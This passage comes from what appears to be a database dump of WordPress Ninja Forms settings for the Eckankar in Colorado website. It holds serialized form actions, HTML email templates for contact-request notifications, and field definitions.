Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:125;}i:1;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:15:\"Success Message\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:127;}i:2;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_96}\";s:13:\"email_subject\";s:39:\"Boulder Area Initiator and ESA Contacts\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:13:\"email_message\";s:3382:\"<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_94},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Boulder Colorado Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:126;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:39:\"Boulder Area Initiator and ESA Contacts\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:13:\"email_message\";s:3892:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Boulder Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Boulder Colorado Leadership Organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_94}Â {field:lastname_95}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_94}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_95}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_96}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_97}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_98}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166297230}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_102}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";}s:2:\"id\";i:128;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:35:\"Central Colorado Initiator and ESAs\";s:10:\"created_at\";s:19:\"2019-08-07 20:08:36\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 16:58:32\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"1\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:7:\"html_93\";i:1;s:10:\"textbox_94\";i:2;s:11:\"lastname_95\";i:3;s:8:\"email_96\";i:4;s:8:\"phone_97\";i:5;s:13:\"listselect_98\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166297230\";i:7;s:12:\"textarea_102\";i:8;s:18:\"html_1663797718830\";i:9;s:10:\"submit_104\";i:10;s:18:\"html_1663797717432\";}s:17:\"allow_public_link\";s:1:\"0\";s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(33,'a:4:{s:2:\"id\";i:33;s:6:\"fields\";a:4:{i:0;a:2:{s:8:\"settings\";a:72:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3277\";s:11:\"field_label\";s:4:\"Name\";s:9:\"field_key\";s:4:\"name\";}s:2:\"id\";i:297;}i:1;a:2:{s:8:\"settings\";a:64:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"2\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";}s:2:\"id\";i:298;}i:2;a:2:{s:8:\"settings\";a:73:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"3\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";s:11:\"field_label\";s:7:\"Message\";s:9:\"field_key\";s:7:\"message\";}s:2:\"id\";i:299;}i:3;a:2:{s:8:\"settings\";a:71:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";s:1:\"5\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s: